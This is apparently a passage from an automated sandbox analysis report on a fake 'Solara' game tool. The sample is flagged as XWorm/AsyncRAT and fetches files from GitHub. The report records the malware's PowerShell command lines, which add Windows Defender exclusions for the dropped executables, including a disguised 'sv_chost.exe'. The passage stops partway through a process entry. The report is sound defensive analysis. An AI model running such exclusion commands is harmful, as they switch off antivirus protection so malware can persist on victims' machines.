                                                              2024-08-24 19:55:05 UTC1370INData Raw: 30 66 65 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 63 61 74 61 6c 79 73 74 5f 6c 69 62 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 68 79 64 72 6f 2d 61 6e 61 6c 79 74 69 63 73 2d 63 6c 69 65 6e 74 5f 2d 37 39 30 31 65 37 2d 64 63 38 38 35 38 37 63 31 34 65 64 2e 6a 73
                                                              Data Ascii: 0fee.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_catalyst_lib_index_js-node_modules_github_hydro-analytics-client_-7901e7-dc88587c14ed.js
                                                              2024-08-24 19:55:05 UTC1370INData Raw: 65 2d 38 39 33 66 39 66 2d 36 63 66 33 33 32 30 34 31 36 62 38 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 73 63 72 6f 6c 6c 2d 61 6e 63 68 6f 72 69 6e 67 5f 64 69 73 74 5f 73 63 72 6f 6c 6c 2d 61 6e 63 68 6f 72 69 6e 67 5f 65 73 6d 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 68 6f 74 6b 65 79 2d 31 61 31 64 39
                                                              Data Ascii: e-893f9f-6cf3320416b8.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_scroll-anchoring_dist_scroll-anchoring_esm_js-node_modules_github_hotkey-1a1d9


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.449731185.199.109.1334437200C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-08-24 19:55:05 UTC135OUTGET /quivings/Solara/main/Storage/version.txt HTTP/1.1
                                                              User-Agent: Solara
                                                              Host: raw.githubusercontent.com
                                                              Connection: Keep-Alive
                                                              2024-08-24 19:55:05 UTC801INHTTP/1.1 404 Not Found
                                                              Connection: close
                                                              Content-Length: 14
                                                              Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                              Strict-Transport-Security: max-age=31536000
                                                              X-Content-Type-Options: nosniff
                                                              X-Frame-Options: deny
                                                              X-XSS-Protection: 1; mode=block
                                                              Content-Type: text/plain; charset=utf-8
                                                              X-GitHub-Request-Id: FE3C:A4EB4:914EDB:A2C9D5:66CA3A99
                                                              Accept-Ranges: bytes
                                                              Date: Sat, 24 Aug 2024 19:55:05 GMT
                                                              Via: 1.1 varnish
                                                              X-Served-By: cache-ewr-kewr1740072-EWR
                                                              X-Cache: MISS
                                                              X-Cache-Hits: 0
                                                              X-Timer: S1724529306.809325,VS0,VE8
                                                              Vary: Authorization,Accept-Encoding,Origin
                                                              Access-Control-Allow-Origin: *
                                                              Cross-Origin-Resource-Policy: cross-origin
                                                              X-Fastly-Request-ID: bdaf9571f5649794f8b717df41ba184de9a7a2f1
                                                              Expires: Sat, 24 Aug 2024 20:00:05 GMT
                                                              Source-Age: 0
                                                              2024-08-24 19:55:05 UTC14INData Raw: 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64
                                                              Data Ascii: 404: Not Found


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              2192.168.2.449732140.82.121.44437200C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-08-24 19:55:06 UTC81OUTGET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1
                                                              Host: github.com
                                                              2024-08-24 19:55:06 UTC473INHTTP/1.1 404 Not Found
                                                              Server: GitHub.com
                                                              Date: Sat, 24 Aug 2024 19:55:04 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                              Cache-Control: no-cache
                                                              Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                              X-Frame-Options: deny
                                                              X-Content-Type-Options: nosniff
                                                              X-XSS-Protection: 0
                                                              Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                                                              2024-08-24 19:55:06 UTC3264INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                              Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co
                                                              2024-08-24 19:55:06 UTC373INData Raw: 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 0a 20 20 6c 61 6e 67 3d 22 65 6e 22 0a 20 20 0a 20 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 0a 20 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 20 64 61 74 61 2d 61 31 31 79 2d 6c 69 6e 6b 2d 75 6e 64 65 72 6c 69 6e 65 73 3d 22 74 72 75 65 22 0a 20 20 3e 0a 0a 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22
                                                              Data Ascii: <!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system" data-a11y-link-underlines="true" > <head> <meta charset="utf-8"> <link rel="dns-prefetch"
                                                              2024-08-24 19:55:06 UTC1370INData Raw: 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2d 63 6c 6f 75 64 2e 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 73 65 72 2d 69 6d 61 67 65 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22
                                                              Data Ascii: ink rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="
                                                              2024-08-24 19:55:06 UTC1370INData Raw: 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 6c 69 67 68 74 5f 68 69 67 68 5f 63 6f 6e 74 72 61 73 74 2d 37 39 62 63 61 37 31 34 35 33 39 33 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 5f 74 72 69 74 61 6e 6f 70 69 61 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 6c 69 67 68 74 5f 74 72 69 74 61
                                                              Data Ascii: lesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-79bca7145393.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_trita
                                                              2024-08-24 19:55:06 UTC1370INData Raw: 74 6f 72 79 5f 72 65 66 73 22 2c 22 63 6f 70 69 6c 6f 74 5f 66 6f 6c 6c 6f 77 75 70 5f 74 6f 5f 61 67 65 6e 74 22 2c 22 63 6f 70 69 6c 6f 74 5f 69 6d 70 6c 69 63 69 74 5f 63 6f 6e 74 65 78 74 22 2c 22 63 6f 70 69 6c 6f 74 5f 73 6d 65 6c 6c 5f 69 63 65 62 72 65 61 6b 65 72 5f 75 78 22 2c 22 63 75 73 74 6f 6d 5f 69 6e 70 22 2c 22 65 78 70 65 72 69 6d 65 6e 74 61 74 69 6f 6e 5f 61 7a 75 72 65 5f 76 61 72 69 61 6e 74 5f 65 6e 64 70 6f 69 6e 74 22 2c 22 66 61 69 6c 62 6f 74 5f 68 61 6e 64 6c 65 5f 6e 6f 6e 5f 65 72 72 6f 72 73 22 2c 22 67 65 6f 6a 73 6f 6e 5f 61 7a 75 72 65 5f 6d 61 70 73 22 2c 22 67 68 61 73 5f 63 6f 70 69 6c 6f 74 5f 61 67 65 6e 74 73 5f 67 61 5f 77 65 62 5f 75 70 64 61 74 65 73 22 2c 22 67 68 6f 73 74 5f 70 69 6c 6f 74 5f 63 6f 6e 66 69 64
                                                              Data Ascii: tory_refs","copilot_followup_to_agent","copilot_implicit_context","copilot_smell_icebreaker_ux","custom_inp","experimentation_azure_variant_endpoint","failbot_handle_non_errors","geojson_azure_maps","ghas_copilot_agents_ga_web_updates","ghost_pilot_confid
                                                              2024-08-24 19:55:06 UTC1370INData Raw: 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 65 6e 76 69 72 6f 6e 6d 65 6e 74 2d 34 61 36 32 66 32 38 33 32 32 38 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e
                                                              Data Ascii: efer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-4a62f2832289.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-n
                                                              2024-08-24 19:55:06 UTC1370INData Raw: 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 74 65 78 74 2d 65 78 70 61 6e 64 65 72 2d 65 6c 65 6d 65 6e 74 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 63 64 34 38 32 32 30 64 37 34 64 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6d 69 6e 69 2d 74 68 72 6f 74 74 6c 65 5f
                                                              Data Ascii: s/vendors-node_modules_github_text-expander-element_dist_index_js-cd48220d74d5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_
                                                              2024-08-24 19:55:06 UTC1370INData Raw: 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 67 69 74 68 75 62 2d 65 6c 65 6d 65 6e 74 73 2d 32 32 31 62 30 65 37 64 37 37 61 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 65 6c 65 6d 65 6e 74 2d 72
                                                              Data Ascii: ="defer" type="application/javascript" src="https://github.githubassets.com/assets/github-elements-221b0e7d77a3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-r
                                                              2024-08-24 19:55:06 UTC1370INData Raw: 5f 74 75 72 62 6f 5f 64 69 73 74 5f 74 75 72 62 6f 5f 65 73 32 30 31 37 2d 65 73 6d 5f 6a 73 2d 38 35 38 65 30 34 33 66 63 66 37 36 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 72 65 6d 6f 74 65 2d 66 6f 72 6d 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 64 65 6c 65 67 61 74 65 64
                                                              Data Ascii: _turbo_dist_turbo_es2017-esm_js-858e043fcf76.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated
                                                              2024-08-24 19:55:06 UTC1370INData Raw: 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 71 75 6f 74 65 2d 73 65 6c 65 63 74 69 6f 6e 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 74 65 78 74 61 72 65 61 2d 61 75 74 6f 73 69 2d 39 65 30 33 34 39 2d 61 62 34 39 37 36 66 63 37 38 61 36 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 75 69 5f 70 61 63 6b 61 67 65 73 5f 75 70 64 61 74
                                                              Data Ascii: de_modules_github_quote-selection_dist_index_js-node_modules_github_textarea-autosi-9e0349-ab4976fc78a6.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_updat


                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              General

                                                              Target ID:0
                                                              Start time:15:54:55
                                                              Start date:24/08/2024
                                                              Path:C:\Users\user\Desktop\Neverlose.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\Neverlose.exe"
                                                              Imagebase:0xff0000
                                                              File size:1'189'376 bytes
                                                              MD5 hash:39D6EC26690FFEE2E74FB9694B30453C
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:Borland Delphi
                                                              Yara matches:
                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1730503666.0000000003937000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1730503666.0000000003937000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                              Reputation:low
                                                              Has exited:true

                                                              General

                                                              Target ID:1
                                                              Start time:15:54:57
                                                              Start date:24/08/2024
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe'
                                                              Imagebase:0x910000
                                                              File size:433'152 bytes
                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:2
                                                              Start time:15:54:57
                                                              Start date:24/08/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7699e0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:4
                                                              Start time:15:55:01
                                                              Start date:24/08/2024
                                                              Path:C:\Users\user\AppData\Local\Temp\Solara.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Users\user\AppData\Local\Temp\Solara.exe"
                                                              Imagebase:0xda0000
                                                              File size:84'480 bytes
                                                              MD5 hash:8AC3D32DDD136180B75C36A39398F39F
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000000.1722027125.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000000.1722027125.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, Author: ditekSHen
                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Solara.exe, Author: Joe Security
                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Solara.exe, Author: ditekSHen
                                                              Antivirus matches:
                                                              • Detection: 100%, Avira
                                                              • Detection: 100%, Joe Sandbox ML
                                                              • Detection: 76%, ReversingLabs
                                                              Reputation:low
                                                              Has exited:false

                                                              General

                                                              Target ID:5
                                                              Start time:15:55:01
                                                              Start date:24/08/2024
                                                              Path:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe"
                                                              Imagebase:0x8c0000
                                                              File size:13'312 bytes
                                                              MD5 hash:6557BD5240397F026E675AFB78544A26
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Antivirus matches:
                                                              • Detection: 33%, ReversingLabs
                                                              Reputation:low
                                                              Has exited:true

                                                              General

                                                              Target ID:6
                                                              Start time:15:55:01
                                                              Start date:24/08/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7699e0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:7
                                                              Start time:15:55:05
                                                              Start date:24/08/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe'
                                                              Imagebase:0x7ff788560000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:8
                                                              Start time:15:55:05
                                                              Start date:24/08/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6795a0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:10
                                                              Start time:15:55:14
                                                              Start date:24/08/2024
                                                              Path:C:\Users\user\AppData\Local\Temp\Solara.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Users\user\AppData\Local\Temp\Solara.exe"
                                                              Imagebase:0x6e0000
                                                              File size:84'480 bytes
                                                              MD5 hash:8AC3D32DDD136180B75C36A39398F39F
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              General

                                                              Target ID:13
                                                              Start time:15:55:19
                                                              Start date:24/08/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Solara.exe'
                                                              Imagebase:0x7ff788560000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:14
                                                              Start time:15:55:19
                                                              Start date:24/08/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7699e0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:15
                                                              Start time:15:55:23
                                                              Start date:24/08/2024
                                                              Path:C:\Users\user\AppData\Local\Temp\Solara.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Users\user\AppData\Local\Temp\Solara.exe"
                                                              Imagebase:0x620000
                                                              File size:84'480 bytes
                                                              MD5 hash:8AC3D32DDD136180B75C36A39398F39F
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              General

                                                              Target ID:16
                                                              Start time:15:55:36
                                                              Start date:24/08/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\sv_chost.exe'
                                                              Imagebase:0x7ff788560000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:17
                                                              Start time:15:55:36
                                                              Start date:24/08/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7699e0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:19
                                                              Start time:15:55:58
                                                              Start date:24/08/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
